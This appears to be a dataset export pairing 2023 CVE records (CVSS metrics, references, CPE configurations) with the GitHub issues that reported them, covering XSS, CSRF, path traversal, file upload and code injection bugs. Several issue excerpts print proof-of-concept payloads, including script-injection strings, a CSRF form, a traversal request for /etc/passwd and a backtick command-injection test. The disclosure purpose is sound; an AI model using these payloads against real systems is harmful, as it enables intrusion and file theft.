cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2023-5044
2023-10-25T20:15:18.187
Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integri...
[ { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2023/10/25/3" }, { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Mitigation", "Vendor Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "B1FAA6D4-954E-4E5F-AB9A-61E1A3F9CD9B", "versionEndExcluding": "1.9.0", "versionEndIncluding": null, "versionSta...
[ "94" ]
94
https://github.com/kubernetes/ingress-nginx/issues/10572
[ "Issue Tracking", "Mitigation", "Vendor Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
### Issue Details A security issue was identified in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where the nginx.ingress.kubernetes.io/permanent-redirect annotation on an Ingress object (in the `networking.k8s.io` or `extensions` API group) can be used to inject arbitrary commands, and obtain the cred...
CVE-2023-5044: Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation
https://api.github.com/repos/kubernetes/kubernetes/issues/126817/comments
15
2023-10-25T15:48:28Z
2024-08-20T13:24:56Z
https://github.com/kubernetes/kubernetes/issues/126817
2,475,634,462
126,817
5,694
CVE-2023-5793
2023-10-26T18:15:08.817
A vulnerability was found in flusity CMS and classified as problematic. This issue affects the function loadCustomBlocCreateForm of the file /core/tools/customblock.php of the component Dashboard. The manipulation of the argument customblock_place leads to cross site scripting. The attack may be initiated remotely. The...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/81252bc764e1de2422e79e36194bba1289e7a0a5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/flusity/flusity-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fluisity:fluisity:*:*:*:*:*:*:*:*", "matchCriteriaId": "93C33CF6-8C36-4B0D-B551-B9CAB1C59219", "versionEndExcluding": "2023-10-24", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 ![de54a801af30a62252c8c0649f8397e](https://github.com/flusity/flusity-CMS/assets/113713406/1fabe5d5-d7d7-4297-9932-8e564e8894cc) Select block ![e3b1a788af0f2b176401ca2fbcc72fd](https://github.com/flusity/flusity-CMS/assets/113...
Customblock in customblock.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/1/comments
2
2023-10-23T07:43:56Z
2024-04-19T02:35:15Z
https://github.com/flusity/flusity-CMS/issues/1
1,956,552,703
1
5,695
CVE-2023-42188
2023-10-27T00:15:09.287
IceCMS v2.0.1 is vulnerable to Cross Site Request Forgery (CSRF).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Thecosy/IceCMS/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://topdayplus.github.io/2023/10/2...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:macwk:icecms:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "C8043F07-E915-49DC-A4D8-DC34AC2B9770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "352" ]
352
https://github.com/Thecosy/IceCMS/issues/17
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Thecosy", "IceCMS" ]
After the administrator open the following page, and click the the Submit request, square message with ID 264 will be deleted. ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.146.129:8181/square/DelectSquareById/264"> <input type="submit" value="Submit ...
There is a CSRF vulnerability that can delete the message
https://api.github.com/repos/Thecosy/IceCMS/issues/17/comments
0
2023-08-30T14:50:03Z
2023-08-30T14:50:03Z
https://github.com/Thecosy/IceCMS/issues/17
1,873,843,313
17
5,696
CVE-2023-46505
2023-10-27T01:15:32.267
Cross Site Scripting vulnerability in FanCMS v.1.0.0 allows an attacker to execute arbitrary code via the content1 parameter in the demo.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PwnCYN/FanCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PwnCYN/FanCM...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:fancms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BA9EC6F1-F8D8-4020-A0F9-41A1BE75592F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "79" ]
79
https://github.com/PwnCYN/FanCMS/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "PwnCYN", "FanCMS" ]
**Software Address:** https://down.chinaz.com/soft/38522.htm **Product Name:** FanCMS **Affect version:** Version 1.0.0 **Vulnerability Type:** Cross Site Scripting **Description:** Navigate to the/themes/static/kindeditor-4.1.7/php --/demo. php file. The content1 parameter was not filtered. <img wid...
FanCMS vulnerability testing
https://api.github.com/repos/PwnCYN/FanCMS/issues/1/comments
0
2023-10-20T13:05:45Z
2023-10-20T13:05:45Z
https://github.com/PwnCYN/FanCMS/issues/1
1,954,255,666
1
5,697
CVE-2023-5810
2023-10-27T01:15:32.317
A vulnerability, which was classified as problematic, has been found in flusity CMS. This issue affects the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument edit_post_id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "9989CEDF-D8FF-40B5-8E62-E4ABECFDBADC", "versionEndExcluding": "2023-10-24", "versionEndIncluding": null, "versionStartEx...
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/2
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 select posts ![image](https://github.com/flusity/flusity-CMS/assets/113713406/f5b40b5c-fd5b-4b35-99e3-2d5305974934) enter payload `?edit_post_id=3);</script><script>alert(1024)</script>` ![image](https://github.com/flusity...
edit_post_id in posts.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/2/comments
4
2023-10-24T10:36:35Z
2023-10-24T17:50:22Z
https://github.com/flusity/flusity-CMS/issues/2
1,958,967,105
2
5,698
CVE-2023-5811
2023-10-27T01:15:32.383
A vulnerability, which was classified as problematic, was found in flusity CMS. Affected is the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument menu_id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public an...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "E9C3388B-D2C5-4EBE-9001-E438E4F263D6", "versionEndExcluding": null, "versionEndIncluding": "2.304", "versionStartExcludi...
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 select posts ![image](https://github.com/flusity/flusity-CMS/assets/113713406/2eb0e2fd-fbb2-4908-a1c6-da576fd7695d) enter payload `?menu_id=3);</script><script>alert(1024)</script>` ![54991eddb621b877603d08a1349386d](https://g...
menu_id in posts.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/3/comments
3
2023-10-24T10:40:44Z
2024-04-19T02:35:06Z
https://github.com/flusity/flusity-CMS/issues/3
1,958,975,399
3
5,699
CVE-2023-5812
2023-10-27T02:15:07.477
A vulnerability has been found in flusity CMS and classified as critical. Affected by this vulnerability is the function handleFileUpload of the file core/tools/upload.php. The manipulation of the argument uploaded_file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PAR...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "E9C3388B-D2C5-4EBE-9001-E438E4F263D6", "versionEndExcluding": null, "versionEndIncluding": "2.304", "versionStartExcludi...
[ "434" ]
434
https://github.com/flusity/flusity-CMS/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 select files ![image](https://github.com/flusity/flusity-CMS/assets/113713406/c1be6738-5617-4fac-ac3e-3f2bb77a9cb9) select upload_file ![image](https://github.com/flusity/flusity-CMS/assets/113713406/8da3e39a-bf14-40dd-a0fe-1...
Unrestricted Upload of File with Dangerous Type in upload.php
https://api.github.com/repos/flusity/flusity-CMS/issues/4/comments
1
2023-10-25T12:24:31Z
2024-04-19T02:35:55Z
https://github.com/flusity/flusity-CMS/issues/4
1,961,299,199
4
5,700
CVE-2023-46503
2023-10-27T04:15:10.673
Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a remote attacker to execute arbitrary code via the reader management and book input modules.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:yxbookcms:1.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A5194B7-87BF-49C7-A090-CEEEAEDC077E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "79" ]
79
https://github.com/PwnCYN/YXBOOKCMS/issues/2
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "PwnCYN", "YXBOOKCMS" ]
**Product Name:** YXBOOKCMS **Affect version:** 1.0.2 **Case Address:** https://down.chinaz.com/soft/37726.htm (Program download address) https://www.ys-bs.com/ (The website address has been hacked) **Vulnerability Type:** Reflected XSS **Description:** The reader management and book input module in t...
YXBOOKCMS Reflected XSS
https://api.github.com/repos/PwnCYN/YXBOOKCMS/issues/2/comments
0
2023-10-20T13:54:30Z
2023-10-20T14:29:58Z
https://github.com/PwnCYN/YXBOOKCMS/issues/2
1,954,344,806
2
5,701
CVE-2023-46504
2023-10-27T04:15:10.723
Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a physically proximate attacker to execute arbitrary code via the library name function in the general settings component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/PwnCYN/YXBOOKCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:yxbookcms:1.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A5194B7-87BF-49C7-A090-CEEEAEDC077E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "79" ]
79
https://github.com/PwnCYN/YXBOOKCMS/issues/1
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "PwnCYN", "YXBOOKCMS" ]
**Product Name:** YXBOOKCMS **Affect version:** 1.0.2 **Case Address:** https://down.chinaz.com/soft/37726.htm (Program download address) https://www.ys-bs.com/ (The website address has been hacked) **Vulnerability Type:** Stored XSS **Description:** The library name can be modified in the general set...
YXBOOKCMS Stored XSS
https://api.github.com/repos/PwnCYN/YXBOOKCMS/issues/1/comments
0
2023-10-20T13:09:52Z
2023-10-20T13:53:48Z
https://github.com/PwnCYN/YXBOOKCMS/issues/1
1,954,262,432
1
5,702
CVE-2023-46569
2023-10-28T02:15:07.583
An out-of-bounds read in radare2 v.5.8.9 and before exists in the print_insn32_fpu function of libr/arch/p/nds32/nds32-dis.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/afeaf8cc958f95876f0ee245b8a002e8" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/223...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcludin...
[ "125" ]
125
https://github.com/radareorg/radare2/issues/22334
[ "Exploit" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86...
global-buffer-overflow in /radare2/libr/arch/p/nds32/nds32-dis.h:1219:33 in print_insn32
https://api.github.com/repos/radareorg/radare2/issues/22334/comments
2
2023-10-20T16:03:32Z
2024-08-15T06:30:02Z
https://github.com/radareorg/radare2/issues/22334
1,954,595,581
22,334
5,703
CVE-2023-46570
2023-10-28T02:15:07.637
An out-of-bounds read in radare2 v.5.8.9 and before exists in the print_insn32 function of libr/arch/p/nds32/nds32-dis.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/d7fa58f1b3418ef08ad244acccc10ba6" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/radareorg/radare2/issues/223...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcludin...
[ "125" ]
125
https://github.com/radareorg/radare2/issues/22333
[ "Exploit" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86...
global-buffer-overflow in /radare2/libr/arch/p/nds32/nds32-dis.h:993:6 in print_insn32_fpu
https://api.github.com/repos/radareorg/radare2/issues/22333/comments
1
2023-10-20T16:02:17Z
2024-08-15T06:31:10Z
https://github.com/radareorg/radare2/issues/22333
1,954,592,663
22,333
5,704
CVE-2023-5837
2023-10-28T22:15:08.630
A vulnerability classified as problematic was found in AlexanderLivanov FotosCMS2 up to 2.4.3. This vulnerability affects unknown code of the file profile.php of the component Cookie Handler. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has b...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/AlexanderLivanov/FotosCMS2/issues/18" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.243802" }, { "sour...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alexanderlivanov:fotoscms2:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9153B8F-7372-4019-B2FA-6BB712EC9E6B", "versionEndExcluding": null, "versionEndIncluding": "2.4.3", "versionS...
[ "79" ]
79
https://github.com/AlexanderLivanov/FotosCMS2/issues/18
[ "Exploit", "Issue Tracking" ]
github.com
[ "AlexanderLivanov", "FotosCMS2" ]
On the profile.php page, line 20 will output, `echo$_ SESSION ['username '].' - Профиль';`, But`$_ SESSION ['username ']` is obtained through the` if (isset ($-COOKIE ['username cookie')) {$_SESSION ['username ']=$-COOKIE ['username cookie'];}` in the cfg. php file,`$_ COOKIE ['username cookie ']` is something that use...
The cookie parameter in profile.php has an XSS vulnerability.
https://api.github.com/repos/AlexanderLivanov/FotosCMS2/issues/18/comments
4
2023-10-23T06:12:31Z
2024-03-15T18:27:04Z
https://github.com/AlexanderLivanov/FotosCMS2/issues/18
1,956,426,373
18
5,705
CVE-2023-46863
2023-10-30T00:15:39.157
Peppermint Ticket Management before 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/users/file/download?filepath=./../ POST request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/108" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Ven...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peppermint:peppermint:*:*:*:*:*:*:*:*", "matchCriteriaId": "E427CA89-5AC0-4D9B-9187-4579D200803F", "versionEndExcluding": "0.2.4", "versionEndIncluding": null, "versionStartE...
[ "22" ]
22
https://github.com/Peppermint-Lab/peppermint/issues/108
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Peppermint-Lab", "peppermint" ]
The application allows users to download files. The `filepath` parameter is vulnerable to a path traversal resulting in reading/downloading arbitrary files from the server. ```http POST /api/v1/users/file/download?filepath=./../../../../../etc/passwd HTTP/1.1 Host: localhost:5000 Content-Type: multipart/form-dat...
Vulnerability: Arbitrary File Download (unauthenticated)
https://api.github.com/repos/Peppermint-Lab/peppermint/issues/108/comments
2
2022-07-21T04:59:27Z
2023-06-10T11:40:16Z
https://github.com/Peppermint-Lab/peppermint/issues/108
1,312,603,587
108
5,706
CVE-2023-46864
2023-10-30T00:15:39.200
Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Ven...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peppermint:peppermint:*:*:*:*:*:*:*:*", "matchCriteriaId": "B8FFA273-1A2B-4C79-921A-660D074E15A8", "versionEndExcluding": null, "versionEndIncluding": "0.2.4", "versionStartE...
[ "22" ]
22
https://github.com/Peppermint-Lab/peppermint/issues/171
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Peppermint-Lab", "peppermint" ]
# Description When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://...
Path Traversal - Arbitrary File Download
https://api.github.com/repos/Peppermint-Lab/peppermint/issues/171/comments
5
2023-10-26T17:12:41Z
2023-11-24T20:17:26Z
https://github.com/Peppermint-Lab/peppermint/issues/171
1,964,005,471
171
5,707
CVE-2023-46865
2023-10-30T01:15:21.967
/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/asylumdx/Crater-CVE-2023-46865-RCE" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/crater-invoice/crater/issues/1267" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:craterapp:crater:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D402EFB-A3FF-49C9-81E8-EF904A46277E", "versionEndExcluding": null, "versionEndIncluding": "6.0.6", "versionStartExclud...
[ "94" ]
94
https://github.com/crater-invoice/crater/issues/1267
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "crater-invoice", "crater" ]
**Description** This is a responsible disclosure. I've contacted the maintainers through huntr.dev on april and they have acknowledged the vulnerability but the project seems to be in maintanance for almost a year. I've given them 5 months to fix(they didnt respond after acknowledging it) and think I should let others...
Post auth remote code exec as superadmin, CVE-2023-46865
https://api.github.com/repos/crater-invoice-inc/crater/issues/1267/comments
5
2023-10-13T10:08:31Z
2023-11-08T05:58:04Z
https://github.com/crater-invoice-inc/crater/issues/1267
1,941,653,997
1,267
5,708
CVE-2023-46866
2023-10-30T03:15:07.783
In International Color Consortium DemoIccMAX 79ecb74, CIccCLUT::Interp3d in IccProfLib/IccTagLut.cpp in libSampleICC.a attempts to access array elements at out-of-bounds indexes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:color:demoiccmax:2022-06-21:*:*:*:*:*:*:*", "matchCriteriaId": "10975878-B3F5-48A0-80B1-2AC1EBD0298D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "787" ]
787
https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "InternationalColorConsortium", "DemoIccMAX" ]
## Bug 1 - Heap Buffer Overflow in CIccCLUT::Interp3d | CVE-2023-46866 ### Patch in PR https://github.com/InternationalColorConsortium/DemoIccMAX/pull/64 Severity: Reference Implementation | High ### Description A heap buffer overflow has been identified in the CIccCLUT::Interp3d method. This vulnerability ...
Bugs from Fuzzing
https://api.github.com/repos/InternationalColorConsortium/DemoIccMAX/issues/54/comments
0
2023-10-26T18:51:51Z
2024-05-09T02:28:54Z
https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54
1,964,174,295
54
5,709
CVE-2020-36767
2023-10-30T19:15:07.767
tinyfiledialogs (aka tiny file dialogs) before 3.8.0 allows shell metacharacters in titles, messages, and other input data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/servo/servo/issues/25498#issuecomment-703527082" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vareille:tinyfiledialogs:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EB85E3F-EB36-4152-9949-76F2A9FA6384", "versionEndExcluding": "3.8.0", "versionEndIncluding": null, "versionSta...
[ "94" ]
94
https://github.com/servo/servo/issues/25498#issuecomment-703527082
[ "Exploit", "Issue Tracking" ]
github.com
[ "servo", "servo" ]
I took a quick look at the issues, but I didn't find a similar one. Also, I hope that this is the right repository to report this. Opening this HTML file executes code on the client: ```html <html> <script> alert("Hey, `id`!"); </script> </html> ``` In the console this produces the following output which...
alert leads to code execution on Linux
https://api.github.com/repos/servo/servo/issues/25498/comments
7
2020-01-12T13:28:18Z
2025-04-24T22:44:48Z
https://github.com/servo/servo/issues/25498
548,570,631
25,498
5,710
CVE-2023-5349
2023-10-30T21:15:07.643
